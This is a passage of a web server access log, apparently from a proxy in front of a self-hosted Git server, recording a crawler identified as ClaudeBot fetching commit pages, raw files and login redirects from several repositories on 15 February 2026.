"/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic%2Fjs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 25895] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Fnginx%2Fproxy_host%2F3.conf" [Client 216.73.216.188] [Length 24756] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fstart.sh" [Client 216.73.216.188] [Length 28423] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico?display=rendered" [Client 216.73.216.188] [Length 11077] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fproxy-host-4_access.log" [Client 216.73.216.188] [Length 27729] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fproxy-host-3_access.log" [Client 216.73.216.188] [Length 37234] [Gzip 10.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fstatic%2Fjs%2Fapp.js" [Client 216.73.216.188] [Length 37471] [Gzip 7.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=source" [Client 216.73.216.188] [Length 11811] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fglobal.json" [Client 216.73.216.188] [Length 21276] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 25842] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Fnginx%2Fproxy_host%2F2.conf" [Client 216.73.216.188] [Length 23756] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2FWorker.cs" [Client 216.73.216.188] [Length 22367] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64?display=source" [Client 216.73.216.188] [Length 11275] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images" [Client 216.73.216.188] [Length 10007] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 216.73.216.188] [Length 10901] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FWorker.cs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2FREADME.md" [Client 216.73.216.188] [Length 29372] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata%2Fnginx%2Fproxy_host" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 22153] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 28729] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fproxy-host-2_access.log" [Client 216.73.216.188] [Length 36023] [Gzip 10.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2F.vscode%2Fsettings.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 11120] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 22242] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt-requests_access.log" [Client 216.73.216.188] [Length 22931] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Findex.html" [Client 216.73.216.188] [Length 26366] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2Fappsettings.json" [Client 216.73.216.188] [Length 21416] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.1" [Client 216.73.216.188] [Length 50330] [Gzip 8.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 11529] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fappsettings.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 45898] [Gzip 7.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.5" [Client 216.73.216.188] [Length 50391] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 70274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.6" [Client 216.73.216.188] [Length 52515] [Gzip 8.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fupdate_status.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 19251] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets" [Client 216.73.216.188] [Length 9772] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2FApp.tsx" [Client 216.73.216.188] [Length 24685] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 9923] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 216.73.216.188] [Length 11605] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 216.73.216.188] [Length 11611] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf?display=rendered" [Client 216.73.216.188] [Length 10872] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fcomponents%2FServices.tsx" [Client 216.73.216.188] [Length 26569] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:27 